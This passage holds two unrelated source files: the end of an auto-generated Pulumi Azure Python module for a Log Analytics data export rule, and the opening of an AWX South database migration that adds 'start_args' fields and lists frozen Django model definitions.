example_analytics_workspace = azure.operationalinsights.AnalyticsWorkspace("exampleAnalyticsWorkspace",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="PerGB2018",
retention_in_days=30)
example_account = azure.storage.Account("exampleAccount",
resource_group_name=example_resource_group.name,
location=example_resource_group.location,
account_tier="Standard",
account_replication_type="LRS")
example_data_export_rule = azure.loganalytics.DataExportRule("exampleDataExportRule",
resource_group_name=example_resource_group.name,
workspace_resource_id=example_analytics_workspace.id,
destination_resource_id=example_account.id,
table_names=["Heartbeat"],
enabled=True)
```
## Import
Log Analytics Data Export Rule can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:loganalytics/dataExportRule:DataExportRule example /subscriptions/00000000-0000-0000-0000-000000000000/resourcegroups/group1/providers/Microsoft.OperationalInsights/workspaces/workspace1/dataExports/dataExport1
```
:param str resource_name: The name of the resource.
:param DataExportRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DataExportRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
destination_resource_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
workspace_resource_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DataExportRuleArgs.__new__(DataExportRuleArgs)
if destination_resource_id is None and not opts.urn:
raise TypeError("Missing required property 'destination_resource_id'")
__props__.__dict__["destination_resource_id"] = destination_resource_id
__props__.__dict__["enabled"] = enabled
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if table_names is None and not opts.urn:
raise TypeError("Missing required property 'table_names'")
__props__.__dict__["table_names"] = table_names
if workspace_resource_id is None and not opts.urn:
raise TypeError("Missing required property 'workspace_resource_id'")
__props__.__dict__["workspace_resource_id"] = workspace_resource_id
__props__.__dict__["export_rule_id"] = None
super(DataExportRule, __self__).__init__(
'azure:loganalytics/dataExportRule:DataExportRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
destination_resource_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
export_rule_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
workspace_resource_id: Optional[pulumi.Input[str]] = None) -> 'DataExportRule':
"""
Get an existing DataExportRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
:param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
:param pulumi.Input[str] export_rule_id: The ID of the created Data Export Rule.
:param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
:param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DataExportRuleState.__new__(_DataExportRuleState)
__props__.__dict__["destination_resource_id"] = destination_resource_id
__props__.__dict__["enabled"] = enabled
__props__.__dict__["export_rule_id"] = export_rule_id
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["table_names"] = table_names
__props__.__dict__["workspace_resource_id"] = workspace_resource_id
return DataExportRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="destinationResourceId")
def destination_resource_id(self) -> pulumi.Output[str]:
"""
The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
"""
return pulumi.get(self, "destination_resource_id")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="exportRuleId")
def export_rule_id(self) -> pulumi.Output[str]:
"""
The ID of the created Data Export Rule.
"""
return pulumi.get(self, "export_rule_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="tableNames")
def table_names(self) -> pulumi.Output[Sequence[str]]:
"""
A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
"""
return pulumi.get(self, "table_names")
@property
@pulumi.getter(name="workspaceResourceId")
def workspace_resource_id(self) -> pulumi.Output[str]:
"""
The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "workspace_resource_id")
[record boundary — remaining per-file quality-signal columns omitted]
[next record: awx/main/south_migrations/0034_v148_changes.py — repo alexander-bauer/awx, blob 8a6e982c4da187823675fc22557e03519217dd44, head d1319b739406dad988f97c41cb92093f180ba822, Python, 48,508 bytes, Apache-2.0, 1 star (2021-06-11), 4 issues (2020-04-29 – 2022-03-01), 1 fork (2018-06-06)]
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'ProjectUpdate.start_args'
db.add_column(u'main_projectupdate', 'start_args',
self.gf('django.db.models.fields.TextField')(default='', blank=True),
keep_default=False)
# Adding field 'Job.start_args'
db.add_column(u'main_job', 'start_args',
self.gf('django.db.models.fields.TextField')(default='', blank=True),
keep_default=False)
# Adding field 'InventoryUpdate.start_args'
db.add_column(u'main_inventoryupdate', 'start_args',
self.gf('django.db.models.fields.TextField')(default='', blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'ProjectUpdate.start_args'
db.delete_column(u'main_projectupdate', 'start_args')
# Deleting field 'Job.start_args'
db.delete_column(u'main_job', 'start_args')
# Deleting field 'InventoryUpdate.start_args'
db.delete_column(u'main_inventoryupdate', 'start_args')
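# South usage note (legacy tooling; commands follow standard South
# conventions, and the previous migration number is assumed from the
# 0034_ prefix of this file):
#   python manage.py migrate main        # apply forwards()
#   python manage.py migrate main 0033   # roll back, running backwards()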
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'main.activitystream': {
'Meta': {'object_name': 'ActivityStream'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'activity_stream'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'changes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'credential': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Credential']", 'symmetrical': 'False', 'blank': 'True'}),
'group': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'host': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Host']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Inventory']", 'symmetrical': 'False', 'blank': 'True'}),
'inventory_source': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.InventorySource']", 'symmetrical': 'False', 'blank': 'True'}),
'inventory_update': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.InventoryUpdate']", 'symmetrical': 'False', 'blank': 'True'}),
'job': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Job']", 'symmetrical': 'False', 'blank': 'True'}),
'job_template': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.JobTemplate']", 'symmetrical': 'False', 'blank': 'True'}),
'object1': ('django.db.models.fields.TextField', [], {}),
'object2': ('django.db.models.fields.TextField', [], {}),
'object_relationship_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'operation': ('django.db.models.fields.CharField', [], {'max_length': '13'}),
'organization': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Organization']", 'symmetrical': 'False', 'blank': 'True'}),
'permission': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Project']", 'symmetrical': 'False', 'blank': 'True'}),
'project_update': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.ProjectUpdate']", 'symmetrical': 'False', 'blank': 'True'}),
'team': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['main.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.User']", 'symmetrical': 'False', 'blank': 'True'})
},
'main.authtoken': {
'Meta': {'object_name': 'AuthToken'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'expires': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'request_hash': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '40', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'auth_tokens'", 'to': u"orm['auth.User']"})
},
'main.credential': {
'Meta': {'unique_together': "[('user', 'team', 'kind', 'name')]", 'object_name': 'Credential'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'cloud': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'credential\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'kind': ('django.db.models.fields.CharField', [], {'default': "'ssh'", 'max_length': '32'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'credential\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'password': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'ssh_key_data': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'ssh_key_unlock': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'sudo_password': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'sudo_username': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'credentials'", 'null': 'True', 'blank': 'True', 'to': "orm['main.Team']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'credentials'", 'null': 'True', 'blank': 'True', 'to': u"orm['auth.User']"}),
'username': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'})
},
'main.group': {
'Meta': {'unique_together': "(('name', 'inventory'),)", 'object_name': 'Group'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'group\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'groups_with_active_failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'has_active_failures': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_inventory_sources': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'hosts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'groups'", 'blank': 'True', 'to': "orm['main.Host']"}),
'hosts_with_active_failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'groups'", 'to': "orm['main.Inventory']"}),
'inventory_sources': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'groups'", 'blank': 'True', 'to': "orm['main.InventorySource']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'group\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'parents': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'children'", 'blank': 'True', 'to': "orm['main.Group']"}),
'total_groups': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_hosts': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'variables': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'})
},
'main.host': {
'Meta': {'unique_together': "(('name', 'inventory'),)", 'object_name': 'Host'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'host\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'has_active_failures': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_inventory_sources': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instance_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'hosts'", 'to': "orm['main.Inventory']"}),
'inventory_sources': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'hosts'", 'blank': 'True', 'to': "orm['main.InventorySource']"}),
'last_job': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'hosts_as_last_job+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.Job']", 'blank': 'True', 'null': 'True'}),
'last_job_host_summary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'hosts_as_last_job_summary+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.JobHostSummary']", 'blank': 'True', 'null': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'host\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'variables': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'})
},
'main.inventory': {
'Meta': {'unique_together': "[('name', 'organization')]", 'object_name': 'Inventory'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventory\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'groups_with_active_failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'has_active_failures': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_inventory_sources': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'hosts_with_active_failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory_sources_with_failures': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventory\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '512'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'inventories'", 'to': "orm['main.Organization']"}),
'total_groups': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_hosts': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_inventory_sources': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'variables': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'})
},
'main.inventorysource': {
'Meta': {'object_name': 'InventorySource'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventorysource\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'credential': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'inventory_sources'", 'null': 'True', 'blank': 'True', 'to': "orm['main.Credential']"}),
'current_update': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'inventory_source_as_current_update+'", 'null': 'True', 'to': "orm['main.InventoryUpdate']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'group': ('awx.main.fields.AutoOneToOneField', [], {'related_name': "'inventory_source'", 'null': 'True', 'default': 'None', 'to': "orm['main.Group']", 'blank': 'True', 'unique': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'inventory_sources'", 'null': 'True', 'to': "orm['main.Inventory']"}),
'last_update': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'inventory_source_as_last_update+'", 'null': 'True', 'to': "orm['main.InventoryUpdate']"}),
'last_update_failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventorysource\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'overwrite': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'overwrite_vars': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'source': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'source_path': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'source_regions': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'source_vars': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'none'", 'max_length': '32'}),
'update_interval': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'update_on_launch': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'main.inventoryupdate': {
'Meta': {'object_name': 'InventoryUpdate'},
'_result_stdout': ('django.db.models.fields.TextField', [], {'default': "''", 'db_column': "'result_stdout'", 'blank': 'True'}),
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'cancel_flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'celery_task_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventoryupdate\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory_source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'inventory_updates'", 'to': "orm['main.InventorySource']"}),
'job_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'job_cwd': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'job_env': ('jsonfield.fields.JSONField', [], {'default': '{}', 'blank': 'True'}),
'license_error': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'inventoryupdate\', \'app_label\': \'main\'}(class)s_modified+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'result_stdout_file': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'result_traceback': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'start_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'new'", 'max_length': '20'})
},
'main.job': {
'Meta': {'object_name': 'Job'},
'_result_stdout': ('django.db.models.fields.TextField', [], {'default': "''", 'db_column': "'result_stdout'", 'blank': 'True'}),
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'cancel_flag': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'celery_task_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'cloud_credential': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'jobs_as_cloud_credential+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.Credential']", 'blank': 'True', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': '"{\'class\': \'job\', \'app_label\': \'main\'}(class)s_created+"', 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['auth.User']"}),
'credential': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'jobs'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Credential']"}),
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'extra_vars': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'forks': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'blank': 'True'}),
'hosts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'jobs'", 'blank': 'True', 'through': "orm['main.JobHostSummary']", 'to': "orm['main.Host']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'jobs'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['main.Inventory']"}),
'job_args': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'job_cwd': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'job_env': ('jsonfield.fields.JSONField', [], {'default': '{}', 'blank': 'True'}),
'job_tags': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
'job_template': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'jobs'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['main.JobTemplate']", 'blank': 'True', 'null': 'True'}),
'job_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'launch_type': ('django.db.models.fields.CharField', [], {'default': "'manual'", 'max_length': '20'}),
